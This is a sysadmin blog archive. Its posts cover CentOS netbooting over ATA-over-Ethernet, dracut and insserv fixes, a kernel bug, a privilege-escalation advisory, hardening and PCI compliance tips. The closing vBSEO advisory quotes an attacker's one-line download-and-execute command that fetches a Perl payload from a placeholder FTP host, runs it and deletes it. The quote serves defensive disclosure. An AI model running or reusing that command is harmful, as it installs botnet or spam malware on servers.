Netboot CentOS 7 on ATAoE

This writeup covers the process of configuring CentOS 7 to boot seamlessly from an ATAoE target.

This is our setup:

  • TFTP server with a MAC-specific boot menu presenting the kernel and initrd. See http://www.syslinux.org/wiki/index.php/PXELINUX
  • Server exporting an LVM Logical Volume with a CentOS 7 install on it using vblade.
  • Computer to boot from the network (This computer has no hard drive and is using the exported LV as it’s disk).

Required components:

  • A kernel that supports AoE and your network card (We are using a custom build 3.17.4 kernel. If you are building your own kernel, the driver for AoE is in Device Drivers —> Block Devices and is called ATA over Ethernet Support. The driver for your network card is in Device Drivers —> Network device support —> Ethernet driver support. The driver for your NIC will be in there somewhere under the appropriate manufacturer).
  • A custom dracut module to bring up the network and discover AoE targets at boot time.
  • Packages:
    • vblade (This is only required on the server exporting the LV).
    • Dracut (dracut, dracut-network, dracut-tools)

Required Steps:

1. Install CentOS 7 onto an LV on the boot server. Since this is not in the scope of this tutorial, I will leave this part up to you. There is plenty of documentation out there (we installed it under KVM first, and exported the resulting disk as an AoE target).
2. Once you have it installed, you need to enter the environment that you deployed in step 1 to install a dracut AoE module and generate an initrd.
3. Next, make sure that you have a kernel that supports aoe and your network card. It is important that both of those kernel modules get built into your initrd or this will not work.
4. At this point (hopefully) we are in the CentOS 7 environment, whether chrooted, virtual machine, or something else; we can now install packages:

1. yum install dracut-network dracut-tools dracut
2. cd /usr/lib/dracut/modules.d/ && ls

You’ll notice that there are a bunch of folders in here, all starting with two digits. The digits signify the order in which the modules are loaded. To make sure all of the prerequisite modules are loaded, we went with 95aoe for our module directory.

3. mkdir 95aoe && cd 95aoe
4. There are 3 files that we need to create — module-setup.sh, parse-aoe.sh, and aoe-up.sh

1. Let’s start with module-setup.sh, since this is the script that will pull into the initrd all of the pieces we need for AoE to work.

#!/bin/bash
# -*- mode: shell-script; indent-tabs-mode: nil; sh-basic-offset: 4; -*-
# ex: ts=8 sw=4 sts=4 et filetype=sh

check() {
        for i in mknod ip rm bash grep sed awk seq echo mkdir; do
                type -P $i >/dev/null || return 1
        done

        return 0
}

depends() {
        echo network
        return 0
}

installkernel() {
        instmods aoe
}

install() {
        inst_multiple mknod ip rm bash grep sed awk seq echo mkdir

        inst "$moddir/aoe-up.sh" "/sbin/aoe-up"
        inst_hook cmdline 98 "$moddir/parse-aoe.sh"
        dracut_need_initqueue
}

2. Next is parse-aoe.sh. This script will load the modules and queue up our main script to be run by init.

#!/bin/sh

modprobe aoe
udevadm settle --timeout=30
/sbin/initqueue --settled --unique /sbin/aoe-up

3. Finally, we need aoe-up.sh, which is what is actually run by init to bring up the network interfaces and discover the AoE device being exported. It’s worth noting that I am setting the MTU to 9000 on each interface, which won’t necessarily be supported on your system. if you are unsure, remove the line “ip link set dev ${INTERFACES[$i]} mtu 9000”:

#!/bin/bash

PATH=/usr/sbin:/usr/bin:/sbin:/bin

exec >>/run/initramfs/loginit.pipe 2>>/run/initramfs/loginit.pipe

mkdir -p /dev/etherd
rm -f /dev/etherd/discover
mknod /dev/etherd/discover c 152 3

INTERFACES=(`ip link |grep BROADCAST |awk -F ":" '{print $2}' |sed 's/ //g' |sed 's/\n/ /g'`)
TOTAL_INTERFACES=${#INTERFACES[@]}

for i in `seq 0 $(($TOTAL_INTERFACES-1))`; do
    ip link set dev ${INTERFACES[$i]} mtu 9000
    ip link set ${INTERFACES[$i]} up
    wait_for_if_up ${INTERFACES[$i]}
done

ip link show

echo > /dev/etherd/discover

5. Now that we have written our AoE dracut module, we need to rebuild the initrd. Before we do this however, we need to make sure that dracut will pull in the modules we need (aoe and your NIC module). There are a few different ways to do this, but here are two options:

1. modprobe aoe && modprobe NIC_MODULE && dracut –force /boot/initramfs-KERNEL_VER.img KERNEL_VER
2. dracut –force –add-drivers aoe –add-drivers NIC_MODULE /boot/initramfs-KERNEL_VER.img KERNEL_VER

6. Now that we have our new initrd, we need to transfer the kernel and initrd to our tftp server

1. scp /boot/initramfs-KERNEL_VER.img /boot/vmlinuz-KERNEL_VER TFTP_SERVER:/path/to/tftp
2. Make sure that permissions are set correctly (should be chmod 644)

7. Before we shut down our CentOS 7 VM, there is one last bit of configuration we need to adjust. Since we require the network to be active to do anything with our FS, we need to make sure that on shutdown, the network isn’t brought down before the FS is unmounted. In CentOS 6, this was as easy as running `chkconfig –level 0123456 on`. CentOS 7 uses systemd, and so this solution will not work. Fortunately the solution is simple (and probably works in CentOS 6 too): Modify /etc/fstab, adding the option _netdev to each mount point that is being exported with AoE (e.g. change defaults to defaults,_netdev).
8. Now we need to get vblade (http://sourceforge.net/projects/aoetools/files/vblade/) and put it on the system exporting the LV with CentOS 7 on it. If you don’t want to install it onto your system, you can just make it and run it from where you extracted it. To export the disk, just run:

1. vbladed -b 1024 -m MAC 0 1 INTERFACE /path/to/disk (for information on what each command does, check out the vblade man page, which is included with the package)

And that’s it! I recommend at this point to run dracut on your netbooted hardware to make sure everything still loads (at this point you shouldn’t have to specifically install the AoE module or your NIC module, so make sure that this is true). Don’t forget to copy the newly created initrd to the TFTP server, and I recommend not overwriting your working initrd so that you can easily go back to a known working state.

What took me days to get working should now only take you an hour or so! I tried to be as detailed as I could, and I don’t think I left anything out, but if you have any issues, please let me know and I’ll update this guide accordingly.

Show the virtual machine name in dstat instead of showing qemu

Do you run dstat to watch Linux KVM hypervisors, but wish process names showed virtual machine names?  Me too.

This patch does just that:

--- a/usr/bin/dstat	2009-11-24 01:30:11.000000000 -0800
+++ b/usr/bin/dstat	2014-11-07 10:20:09.719148833 -0800
@@ -1946,6 +1946,12 @@
         return os.path.basename(name)
     return name

+def index_containing_substring(the_list, substring):
+	for i, s in enumerate(the_list):
+		if substring in s:
+			return i
+	return -1
+
 def getnamebypid(pid, name):
     ret = None
     try:
@@ -1956,6 +1962,10 @@
         if ret.startswith('-'):
             ret = basename(cmdline[-2])
             if ret.startswith('-'): raise
+        if any("qemu" in s for s in cmdline):
+            idx = index_containing_substring(cmdline, '-name')
+            if idx >= 0:
+                ret = cmdline[idx+1]
         if not ret: raise
     except:
         ret = basename(name)

CentOS6 initrd says “already mounted or /sysroot busy”

If you are booting a CentOS 6 system after having migrated its root filesystem to a new volume, you might get the following errors if /proc or /sys is missing:

EXT4-fs (dm-0): mounted filesystem with ordered data mode. Opts: 
mount: /dev/mapper/vg0-root already mounted or /sysroot busy
mount: according to mtab, /dev/mapper/vg0-root is already mounted on /sysroot
dracut: Remounting /dev/mapper/vg0-root with -o relatime,ro
EXT4-fs (dm-0): mounted filesystem with ordered data mode. Opts: 
mount: /dev/mapper/vg0-root already mounted or /sysroot busy
mount: according to mtab, /dev/mapper/vg0-root is already mounted on /sysroot
dracut: Remounting /dev/mapper/vg0-root with -o relatime,ro
EXT4-fs (dm-0): mounted filesystem with ordered data mode. Opts: 
dracut Warning: Can't mount root filesystem

To fix this, all you need to do is mount the root filesystem and “mkdir proc/ sys/”. You can even do this from inside of dracut if you add the “rdshell” argument to the end of your kernel command line:

dracut:/# mount -o remount,rw /sysroot
dracut:/# mkdir /sysroot/proc /sysroot/sys
dracut:/# mount -o remount,ro /sysroot
dracut:/# exit
(You may need to reboot the server)

-Eric

 

 

Forcing insserv to start sshd early

Many distributions are using the `insserv` based dependency following at boot time.  After a bit of searching, I found very little actual documentation on the subject.  Here’s the process:

  1. Add override files to /etc/insserv/override/
  2. The files must contain ‘### BEGIN INIT INFO’ and ‘### END INIT INFO’, else insserv will ignore them.
  3. Some have indicated that you can override missing LSB fields with this method, however, it does require the Default-Start and Default-Start options even though you wouldn’t expect to need to override those.
  4. The name of the file in /etc/insserv/override must be equal to the name in /etc/init.d *not* the name it “Provides:”.  In an ideal world, the name would be the same as provides—but in this case that isn’t always so.

For my purpose, I created overrides for all of my services in rc2.d with this script.  Note that the overrides are just copies of the content  from the /etc/init.d/ scripts:

cd /etc/rc2.d
# This is one long line; $f is filename, $p is the Provides value.
grep Provides * | cut -f1,3 -d: | tr -d : | while read f p; do perl -lne '$a++ if /BEGIN INIT INFO/; print if $a; $a-- if /END INIT INFO/' $f > /etc/insserv/overrides/$p;done

Note that the script writes the filename from the “Provides” field so you may need to change the filename if you have initscripts where /etc/init.d/script doesn’t match the Provides field.  Notably, Debian Wheezy does not follow this for ssh.  Provides is sshd, but the script is named ssh.

Next, I append sshd to the Require-Start line of all of my overrides:

cd /etc/insserv/overrides/
perl -i -lne 's/(Required-Start.*)$/$1 sshd/; print' *

This of course creates a cyclic dependency for ssh, so fix that one up by hand.  Feel free to make any other boot-order preferences while you’re in the overrides directory.  For this case, ssh  was made dependent on netplug.

Finally, run `insserv` and double-check that it did what you expected:

# cat /etc/init.d/.depend.start
TARGETS = rsyslog munin-node killprocs motd sysfsutils sudo netplug rsync ssh mysql openvpn ntp wd_keepalive apache2 bootlogs cron stop-readahead-fedora watchdog single rc.local rmnologin
INTERACTIVE =
netplug: rsyslog
rsync: rsyslog
ssh: rsyslog netplug
mysql: rsyslog ssh
ntp: rsyslog ssh
[...snip...]

Viola!  Now I can ssh to the host far earlier, and before services that can take a long time to start to troubleshoot in case of a problem.  In my opinion, ssh should always run directly after the network starts.

-Eric

 

Linux Kernel bug from 2002?

Really Old Bugs

Apparently there is a bug from kernels as old as 2.5.44 that pop up every so often causing hours of work for developers to hunt down.  Hopefully it can be fixed upstream, or maybe this is a “won’t fix” for some very good reason that I am unaware of:  http://osdir.com/ml/linux.enbd.general/2002-10/msg00176.html .  In my opinion, an issue like this should give some meaningful error rather than causing deadlock.

 

The fix

Basically add_disk (and therefore register_disk() where the problem actually resides) must be called *before* set_capacity() in Linux block device drivers.  This is backwards of the way I would think, as I would configure the device parameters before publishing it into userspace—but that is backwards in the Linux kernel and can (will?) cause deadlock.

Upstream

Recently I encountered this issue/bug in a zfs-git (zfsonlinux) build.  I’ve resolved the kernel hang and I’m working on a minimal patch for ZFS.  For now follow this ZFS ZVOL issue on github: https://github.com/zfsonlinux/zfs/issues/1488 .

Update: a pull request is pending here: https://github.com/zfsonlinux/zfs/pull/1491 and a patch has been listed on the issues page.

 

-Eric

CVE-2013-2094: Linux Root Privilege Escalation Attack

On May 14th an attack in the wild began circling which enables non-root users to become root for kernels 2.6.37–3.8.8 (inclusive) compiled with PERF_EVENTS, in addition to cirtain earlier kernels containing the bug as a backport. This only affects 64-bit operating systems.  This is the best technical writeup I have seen on the subject: CVE-2013-2094 Perf Events Exploit Explained

Ubuntu 10.04 is not affected.
RHEL 5 are not affected.
Debian Squeeze is not affected.

Known Vulnerable Distributions and Kernel Versions

NOTE: You are extra-vulnerable if you have untrusted non-root users on your server!

CentOS/RHEL kernels earlier than 2.6.32-358.6.2
If you can’t reboot, try this fix: https://access.redhat.com/site/solutions/373743

Ubuntu 12.04 3.2 kernels earlier than 3.2.0-43.68
Ubuntu 12.04 3.5 kernels earlier than 3.5.0-30.51~precise1
Ubuntu 12.10 3.5 kernels earlier than 3.5.0-30.51
Ubuntu 13.04 3.8 kernels earlier than 3.8.0-21.32

Debian Wheezy 3.2 kernels earlier than 3.2.41-2+deb7u2
Debian Jessie 3.2 kernels earlier than 3.2.41-2+deb7u2
Debian unstable 3.8 kernels earlier than 3.8.11-1

There may be other back-ported kernels which have this vulnerability, so if in doubt, update your kernel!

Linux is Easy!

My colleague Dave Kaplan just published an eBook entitled Linux is Easy! available for preview and purchase.  Dave’s Linux interests are focused around Desktop installations and promoting Linux whenever appropriate.  Dave and I share work back-and-forth and we complement eachother well; his focus is Linux-desktop whereas my service and experience is Linux-server based.

So if you landed here wondering what the Linux buzz is all about and you’d like to give Linux a spin on your desktop or laptop— just check out the eBook, download Linux Mint, and give it a spin!

-Eric

Tightening CentOS/RHEL Security

While there is far more to hardening a server than this single example, this is an often overlooked security issue in many default installations of RHEL and RHEL-based distributions (CentOS, Scientific Linux, etc.)

CentOS and RHEL come with the isdn4k-utils and coolkey packages installed by default for graphical workstations.  Unfortunately, these packages create world-writable directories which binaries and scripts may execute from.  While it is common to tighten /tmp, /var/tmp and /usr/tmp against execution attacks, these directories often go un-noticed.

If you do not use these utilities (and few servers do), they can be easily removed:

yum remove isdn4k-utils coolkey

Of course if you are using these, then you should find a way to secure these mountpoints with the noexec mount option.  This can be done with a loopback filesystem mounted atop the offending mountpoints or with separate LVM volumes for each.

Traditionally, /var does not run executable code so you could mount the entire /var mountpoint as noexec.  Its a great security practice if you can support this, however, there are some packages which expect to run their update scripts out of /var/tmp/ so be prepared to fix some broken package updates or installations.  When you do have a package error, simply mount /var as executable:

mount -o remount,rw,exec /var

install the package, and then disable execution on the mountpoint:

mount -o remount,rw,noexec /var

I recommend nosuid and nodev mount options for these types of mount points as well to restrict less common attack vectors.

-Eric

Linux PCI Compliance: Passing the Scan

PCI Compliance Introduction

PCI compliance is required by the credit card card processing industry.  If you are a merchant provider, no doubt you have been contacted by a PCI compliance scanning vendor of some form, generally sponsored by your bank or merchant provider.

Passing a PCI compliance scan is not too difficult, though there are a few technical hurdles to pass.

 

Server and Network Scanning

Generally speaking, you are required to answer an (excessively) long series of security questions, many of which may have no relation to your business.  Further, they obtain your server IP addresses and scan your systems for security vulnerabilities.

The report format varies, but generally you receive a brief technical description for each item, usually linked to the CVE “Common Vulnerabilities and Exposures” database.  If you are technically inclined or have technical staff who understand what should be changed to pass the scan, then you can generally resolve this internally.

If not, then unfortunately the scanning vendors do not offer support when a compliance scan fails and you are left to your own devices.

 

Passing the PCI Compliance Scan for Linux

Keep in mind that the purpose of passing a scan isn’t just to pass: passing the scan means your server meets a minimum baseline security level for operation on the public Internet.  Not only will your merchant provider be tickled by your compliance, but your server will be more secure for the effort.

There are a series of general security practices that you can follow which will help you pass your scan and increase server security at the same time:

  • Run only the services which are absolutely necessary for your server’s operation
  • Install distribution package and security updates
  • Configure a firewall to minimize the scan surface available to the scanner or to an attacker
  • Use SSL certificates signed by a reputable certificate authority
  • Make sure intermediate SSL certificates are installed
  • Configure your SSL framework to force strong cryptographic ciphers
  • Be certain that the domain being scanned matches the common name on the certificates.  For example: if your SSL certificate is www.example.net but your website is www.example.com, then you will probably fail the PCI scan.
  • Use your web server’s document root for a single purpose.  For example, develop your new shiny website on a different or internal domain, not in the “/dev” or “/new” directory on your production site.
  • Make sure your web application is up to date—especially if your site is based on an old version of an open-source content management system such as WordPress or Joomla.
  • Dedicate one server per application function.  For example, have mail on a dedicated mail server, web on a dedicated web server.  Running both services on the same machine increases your security exposure and makes it more difficult to pass your PCI scan.

If you have followed these practices and are still having trouble passing your scan—or just want to increase your server’s security—then give me a call.  I’m always happy to help!

-Eric

 

 

vBulletin and vBSEO Exploit: Attacks in the Wild

We are seeing the use of this exploit in the wild:

BSEO <= 3.6.0 “proc_deutf()” Remote PHP Code Injection

Its been patched for over a year, but someone has automated scanning for vbseocp.php and hosts are getting compromised.

The fix is to update vBSEO to the latest version, and the source of the attack lives here: ./vbseo/includes/functions_vbseocp_abstract.php with improper escaping of the char_repl POST parameter.  This is vulnerable whether or not you have register_globals enabled.

The attack we are seeing takes the form of:

cd /tmp;wget ftp://user:pass@host/x.pl;curl -O ftp://user:pass@host/x.pl;perl x.pl;rm -rf x.pl

We have seen two distinct payloads: an IRC c&c bot and a spam engine executing from /tmp/.  The IRC bot sets its name as /usr/local/sbin/httpd to appear benign and makes outbound IRC connections.

If you think you may be infected, contact us as soon as possible so we can get this removed and locked down.  Our standard countermeasures would have prevented this attack even on unpatched hosts.

-Eric